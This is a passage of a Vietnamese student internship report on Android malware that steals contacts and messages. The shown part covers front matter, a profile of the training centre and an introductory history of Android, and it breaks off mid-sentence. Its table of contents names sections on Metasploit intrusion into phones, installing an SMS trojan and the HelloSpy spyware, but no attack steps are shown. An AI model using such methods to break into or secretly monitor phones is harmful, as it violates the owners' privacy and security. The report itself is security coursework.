báo cáo thực tập cuối kì

88
Báo cáo thc tp GVHD: Võ Đỗ Thng SVTT: Nguyn Tun Kit - 1120084 Trang 1 B GIO DC V ĐO TO TRƯỜNG ĐI HC KHOA HC TNHIÊN KHOA ĐIỆN T- VIN THÔNG BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI Nơi thực tp : TT.QUN TRMNG & AN NINH MNG QUC TATHENA Thi gian : 7/7/2014 7/9/2014 GVHD : VÕ ĐỖ THẮNG SVTT : NGUYỄN TUẤN KIỆT MSSV : 1120084 TP.HCM, THÁNG 8 NĂM 2014

Upload: tuankiet123

Post on 10-Jul-2015

92 views

Category:

Education


5 download

TRANSCRIPT

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 1

BÔ GIAO DUC VA ĐAO TAO

TRƯỜNG ĐAI HỌC KHOA HỌC TỰ NHIÊN

KHOA ĐIỆN TỬ - VIỄN THÔNG

BÁO CÁO ĐỀ TÀI THỰC TẬP

ĐỀ TÀI:

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO

PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH

CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ

DỤNG ANDROID VÀ GỬI RA NGOÀI

Nơi thực tập : TT.QUẢN TRỊ MANG & AN NINH MANG QUỐC TẾ ATHENA

Thời gian :

7/7/2014 – 7/9/2014

GVHD : VÕ ĐỖ THẮNG

SVTT : NGUYỄN TUẤN KIỆT

MSSV : 1120084

TP.HCM, THÁNG 8 NĂM 2014

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 2

LỜI CAM ĐOAN

Em xin cam đoan:

Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực tiếp của thầy

Võ Đỗ Thắng.

Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công

trình, thời gian, địa điểm công bố.

Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn

trách nhiệm.

TPHCM, ngày 16 tháng 08 năm 2014

Sinh viên thực tập

Nguyễn Tuấn Kiệt

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 3

LỜI CẢM ƠN

KHOA ĐIỆN TỬ VIỄN THÔNG

Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử viễn

thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành tốt đợt thực

tập này. Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh nghiệm cho bản thân.

Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc

sau này.

Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt nhất.

Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất định. Em rất

mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong tương lai.

Một lần nữa em xin chân thành cảm ơn.

TPHCM, ngày 16 tháng 08 năm 2014

Sinh viên thực tập

Nguyễn Tuấn Kiệt

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 4

LỜI CẢM ƠN

TRUNG TÂM ATHENA

Em xin cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena,

cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã

nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo

mọi điều kiện thuận lợi, cung cấp những kiến thức cần thiết cũng như đóng góp những ý

kiến quý báu để em hoàn thành tốt bài báo cáo này.

Một lần nữa em xin chân thành cảm ơn.

TPHCM, ngày 16 tháng 08 năm 2014

Sinh viên thực tập

Nguyễn Tuấn Kiệt

Thầy Võ Đỗ Thắng (bên trái) cùng SVTT Nguyễn Tuấn Kiệt (bên phải)

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 5

NHẬN XÉT CỦA KHOA

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Chủ nhiệm khoa

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 6

NHẬN XÉT CỦA GIAO VIÊN HƯỚNG DẪN

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

..............................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Giáo viên hướng dẫn

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 7

LỜI GIỚI THIỆU

Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các công ty

nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho tin tặc cùng

các phần mềm độc hại.

Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để nhận ra

rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào trường hợp

facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng đông đảo, lập

tức nó trở thành đích ngắm của các tin tặc. Giới tội phạm mạng luôn tìm mọi cách để lợi

dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số đông thiết bị. Và

điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi mới đến thiết bị. Các nhà

nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng Android bất cẩn luôn tải về ứng

dụng mà không thèm kiểm tra tìm hiểu trước xem chúng có an toàn hay không.

Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android đồng

thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo cáo của em.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 8

Mục lục PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP ............................................................................... 11

1. Giới thiệu về Trung tâm Athena ............................................................................................. 11

2. Trụ sở và các chi nhánh .......................................................................................................... 11

3. Quá trình hình thành và phát triển .......................................................................................... 12

3.1. Quá trình hình thành ........................................................................................................ 12

3.2. Quá trình phát triển .......................................................................................................... 13

3.3. Cơ cấu tổ chức ................................................................................................................. 14

4. Tình hình hoạt động trong năm 2011 ...................................................................................... 15

4.1. Cơ cấu sản phẩm .............................................................................................................. 15

4.1.1. Các khóa học dài hạn ................................................................................................ 15

4.1.2. Các khóa học ngắn hạn ............................................................................................. 15

4.1.2.1. Khóa Quản trị mạng .............................................................................................. 15

4.1.2.2. Khóa thiết kế web và bảo mật mạng ..................................................................... 15

4.1.2.3. Các sản phẩm khác. ................................................................................................ 15

5. Chiến lược Marketing của Trung tâm Athena ........................................................................ 16

5.1. Chiến lược sản phẩm ....................................................................................................... 16

5.2. Chiến lược tập hợp sản phẩm: ......................................................................................... 16

5.3. Chiến lược dòng sản phẩm: ............................................................................................. 17

PHẦN 2: BÁO CÁO ĐỀ TÀI ........................................................................................................ 18

1. Giới thiệu về Android ............................................................................................................. 18

1.1. Android là gì? .................................................................................................................. 18

1.2. Lịch sử phát triển Anroid ................................................................................................. 18

1.3. Đặt điểm của Android ...................................................................................................... 19

1.3.1. Tính mở .................................................................................................................... 19

1.3.2. Tính ngang bằng của các ứng dụng. ......................................................................... 19

1.3.3. Phá vỡ rào cản phát triển ứng dụng. ......................................................................... 19

1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng .......................................................... 19

1.4. Các phiên bản của android ............................................................................................... 20

1.5. Tỷ lệ sử dụng các phiên bản android ............................................................................... 22

1.6. So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich): ........... 22

1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt ............................................. 23

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 9

1.6.2. Sự khác nhau về giao diện ......................................................................................... 23

1.6.3. Sự khác nhau về tính năng ......................................................................................... 25

1.6.4. Sự khác nhau về giao thức mạng ................................................................................ 25

2. Nghiên cứu về mã độc trong mỗi trường android ................................................................... 26

2.1. Malware là gì? ................................................................................................................. 26

2.2. Phân loại .......................................................................................................................... 27

2.3. Cơ chế hoạt động của Malware ....................................................................................... 27

2.4. Mục đích của Malware DroidDream ............................................................................... 28

2.5. Dấu hiệu bị nhiễm các phần mềm độc hại ....................................................................... 28

3. Xâm nhập android qua mạng local ......................................................................................... 29

3.1. Giới thiệu về Kali Linux .................................................................................................. 29

3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian ................................................... 29

3.1.2. Hỗ trợ mạng không dây tốt hơn................................................................................ 29

3.1.3. Khả năng tùy biến cao .............................................................................................. 29

3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai ..................................... 30

3.2. Cài đặt Kali Linux ........................................................................................................ 30

3.3. Metasploit framework trong Kali linux ........................................................................... 40

3.3.1. Giới thiệu .................................................................................................................. 40

3.3.2. Sử dụng metasploit framework ................................................................................ 40

3.4. Tấn công android dùng Metasploit Framework trong Kali Linux ................................... 42

4. Thực hiện xâm nhập android thông qua mạng Internet .......................................................... 49

4.1. Giới thiệu về VPS ............................................................................................................ 49

4.1.1. VPS là gì? ................................................................................................................. 49

4.1.2. Đặc điểm về thông số VPS ....................................................................................... 50

4.1.3. Giá trị khi sử dụng VPS ........................................................................................... 50

4.2. Cài đặt metasploit ............................................................................................................ 51

4.3. Xâm nhập vào thiết bị android ......................................................................................... 57

5. Cài đặt SMS Trojan dùng iCalender ....................................................................................... 67

5.1. Cài đặt máy ảo android AVD Manager .............................................................................. 67

5.1.1. Cài đặt JDK: ............................................................................................................. 67

5.1.2. Cài đặt android SDK ................................................................................................ 68

5.1.3. Cài đặt máy ảo android ................................................................................................ 69

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 10

5.2. Cài SMS Trojan vào máy android ảo ................................................................................. 71

5.2.1. Các công cụ cần thiết ................................................................................................. 71

5.2.2. Các bước thực hiện ................................................................................................... 72

6. Tìm hiểu về HelloSpy để theo dõi thiết bị android ................................................................. 79

6.1. HelloSpy là gì? ................................................................................................................ 79

6.2. Tính năng của HelloSpy .................................................................................................. 79

6.2.1. Truy cập từ xa:.......................................................................................................... 79

6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ): ...................................................... 79

6.2.3. Theo dõi lịch sử Internet: ......................................................................................... 79

6.2.4. Spy cuộc gọi ghi âm: ................................................................................................ 79

6.2.5. Theo dõi tất cả bắt hình ảnh: .................................................................................... 79

6.2.6. Kiểm soát các ứng dụng và chương trình: ................................................................ 79

6.2.7. Theo dõi tin nhắn SMS: ............................................................................................ 80

6.2.8. Theo dõi Viber, facebook và yahoo thông điệp: ...................................................... 80

6.2.9. GPS Tracking: .......................................................................................................... 80

6.2.10. Lịch sử màn hình cuộc gọi: ...................................................................................... 80

6.3. Cài đặt HelloSpy .............................................................................................................. 80

7. Tổng kết .................................................................................................................................. 85

8. Kinh nghiệm đạt được sau đợt thực tập .................................................................................. 86

9. Các link báo báo ...................................................................................................................... 87

10. Các link tham khảo .................................................................................................................. 88

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 11

PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP

1. Giới thiệu về Trung tâm Athena

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công

ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM

ĐAO TAO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của

Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK

SECURITY COMPANY LIMITED

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh

nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến

trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:

- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính,

internet, bảo mật và thương mại điện tử….

- Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh

doanh.

- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về

mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu

cầu.

- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu

thông tin về các ứng dụng và sự cố mạng.

- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố

máy tính.

2. Trụ sở và các chi nhánh

- Trụ sở chính:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.athena.com.vn

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 12

Điện thoại: ( 84-8 ) 3824 4041

Hotline: 0943 23 00 99

- Cơ sở 2_Tại TP Hồ Chí Minh:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Website: www.Athena.Edu.Vn

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 20 00 88

- Chi nhánh Nha Trang

+ Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692

+ Website: www.athena.edu.vn

+ Email : [email protected]

3. Quá trình hình thành và phát triển

3.1.Quá trình hình thành

Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh

vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin

nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm

nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực

lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh

nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công

nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám

đốc dự án của công ty Siemen Telecom.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 13

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công

ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ

thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành

viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.

3.2.Quá trình phát triển

Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành

một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và

đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project

2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh

viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội

ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất

nước nói chung, các doanh nghiệp, cá nhân nói riêng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh

tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia

an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc,

đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực

công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của

trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với

khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn

Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ

hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu

quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác.

Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến

trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 14

đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm.

Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép

đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng

hoảng.

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo

quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung

tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với

sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp

nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến

trình tin học hóa nước nhà.

3.3.Cơ cấu tổ chức

Sơ đồ tổ chức công ty

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 15

4. Tình hình hoạt động trong năm 2011

4.1.Cơ cấu sản phẩm

4.1.1. Các khóa học dài hạn

- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.

4.1.2. Các khóa học ngắn hạn

4.1.2.1.Khóa Quản trị mạng

- Quản trị mạng Microsoft căn bản ACBN

- Phần cứng máy tính, laptop, server

- Quản trị hệ thống mạng Microsoft MCSA Security.

- Quản trị mạng Microsoft nâng cao MCSE

- Quản trị window Vista

- Quản trị hệ thống Window Server 2003:2008

- Lớp Master Exchange Mail Server

- Quản trị mạng quốc tế Cissco CCNA

- Quản trị hệ thống mạng Linux 1 và Linux 2.

4.1.2.2.Khóa thiết kế web và bảo mật mạng

- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart

- Lập trình web với Php và MySQL

- Bảo mật mạng quốc tế ACNS

- Hacker mũ trắng

- Athena Mastering Firewall Security

- Bảo mật website.

4.1.2.3. Các sản phẩm khác.

- Chuyên đề thực hành sao lưu và phục hồi dữ liệu

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 16

- Chuyên đề thực hành bảo mật mạng Wi_Fi

- Chuyên đề Ghost qua mạng

- Chuyên đề xây dựng và quản trị diễn đàn

- Chuyên đề bảo mật dữ liệu phòng chống nội gián

- Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thương mại điện tử.

5. Chiến lược Marketing của Trung tâm Athena

5.1. Chiến lược sản phẩm

Chiến lược sản phẩm là sự cố kết gắn bó của sự lựa chọn và của những biện pháp phải sử dụng

để xác định một tập hợp sản phẩm bao gồm các dòng sản phẩm và các món hàng sao cho phù hợp

nhất với thị trường mục tiêu và từng giai đoạn khác nhau trong chu kì sản phẩm.

Chiến lược sản phẩm đóng vai trò cực kì quan trọng trong hoạt động Marketing, nó là công cụ

cạnh tranh bền vững của doanh nghiệp. Thực hiện tốt chiến lược về sản phẩm thì các chiến lược

giá, phân phối, xúc tiến mới được triển khai và phối hợp một cách hiệu quả nhất. Không chỉ thế,

chiến lược sản phẩm còn là một trong những yếu tố giúp doanh nghiệp thực hiện tốt mục tiêu

marketing trong từng thời kì.

Với phương châm “ Uy tín, chất lượng đào tạo và sự hài lòng của khách hàng” lên hàng đầu.

Trung tâm Đào tạo Quản trị và An ninh mạng Athena luôn nổ lực tập trung vào nâng cao chất lượng

giáo dục, tuyển dụng đội ngũ giảng viên có trình độ chuyên môn và kinh nghiệm cao, đội ngũ tư

vấn viên giúp học viên có thể lựa chọn những chương trình phù hợp và Bộ phận chuyên trách về

cập nhật thông tin cũng như làm mới giáo án nhằm đảm bảo chất lượng đào tạo tốt nhất cho từng

học viên khi đến với trung tâm.

Chính vì xác định được tầm quan trọng của chiến lược sản phẩm, Trung tâm Đào tạo Quản trị

và An ninh mạng Athena đã đưa ra các chiến lược sản phẩm như sau:

5.2. Chiến lược tập hợp sản phẩm:

Athena tập trung vào chiến lược mở rộng tập hợp sản phẩm. Có nghĩa là Athena tăng thêm các

dòng sản phẩm mới thích hợp với từng thời kì cụ thể theo yêu cầu của khách hàng, cụ thể theo từng

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 17

giai đoạn phát triển của doanh nghiệp cũng như yêu cầu của xã hội về lĩnh vực công nghệ thông

tin.

Vào những ngày đầu thành lập với tư cách là một nhóm nhỏ bao gồm các thành viên yêu thích

lĩnh vực công nghệ thông tin và hổ trợ các doanh nghiệp với chương trình “ ứng cứu máy tinh”.

Athena tập trung vào lĩnh vực đào tạo chuyên gia an ninh mạng AN2S và chương trình cảnh sát

máy tính nhằm giúp các doanh nghiệp xử lý các vấn đề về máy tính và mạng máy tính. Đào tạo và

cung cấp cho xã hội lực lượng nguồn lao động trong lĩnh vực bảo vệ máy tính và mạng máy tính.

Trong quá trình phát triển, internet trở thành một công cụ hữu hiệu và là phương tiện kinh

doanh của hầu hết các tổ chức, doanh nghiệp, cá nhân. Để đáp ứng được nhu cầu ngày càng tăng

cao về nguồn nhân lực trong lĩnh vực mạng internet, Athena tăng thêm các khóa học về mạng máy

tính, chuyên gia online marketing hay các khóa học về E_marketing.

Ngày nay, với sự phát triển mạnh mẽ của ngành công nghệ thông tin, ngày càng nhiều doanh

nghiệp đòi hỏi các chứng chỉ quốc tế trong lĩnh vực này. Nắm bắt được xu thế mới của thời đại,

Trung tâm Đào tạo Quản trị và An ninh mạng Athena đã mở rộng chương trình đào tạo, tổ chức

thêm các khóa học đạt chứng chỉ quốc tế như MCSA, Quản trị mạng Cissco….

5.3. Chiến lược dòng sản phẩm:

Để có thể phân bổ rủi ro cũng như nâng cao được mức lợi nhuận cho doanh nghiệp. Trung tâm

Đào tạo Quản trị và An ninh mạng Athena tập trung vào chiến lược phát triển dòng sản phẩm bằng

cách tập trung đầu tư vào những dòng sản phẩm chủ lực của doanh nghiệp để tối đa hóa lợi nhuận,

đồng thời phát triển thêm các dòng sản phẩm mới như các khóa chuyên đề nhằm hổ trợ tạo sự đa

dạng của các dòng sản phẩm, đáp ứng được nhu cầu của xã hội, cố gắng dẫn đầu thị trường và lắp

kín các lỗ hổng để ngăn ngừa đối thủ cạnh tranh. Trong đó khóa học chủ lực của doanh nghiệp là

các khóa học lấy các chứng chỉ quốc tế như: MCSE, Quản trị mạng Cissco, Bảo mật web

Security+…

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 18

PHẦN 2: BAO CAO ĐỀ TÀI

1. Giới thiệu về Android 1.1.Android là gì?

Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động

có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007

cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần

cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động.

Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.

Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã nguồn

mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết bị, mạng

di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một cách tự do.

Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng dụng để mở

rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào tháng 10 năm

2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google Play, cửa hàng

ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt.

Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế giới,

vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần một hệ

điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công nghệ cao

thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy tính bảng,

Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở của Android

cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng mã nguồn mở

để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính năng cao cấp cho

những người dùng thích tìm tòi hoặc đưa Android vào các thiết bị ban đầu chạy hệ điều hành khác.

Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm

2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự

thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến bằng

phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty công nghệ.

1.2.Lịch sử phát triển Anroid

Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo

Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google gồm

có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire

Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm

thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của Android,

ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những tin đồn về

việc Google có ý định bước vào thị trường điện thoại di động.

Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt nhân

Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những tiền đề

về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một

số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và các đối tác

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 19

phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau.

Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong

tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công

nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực

hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài viết về những tin đồn

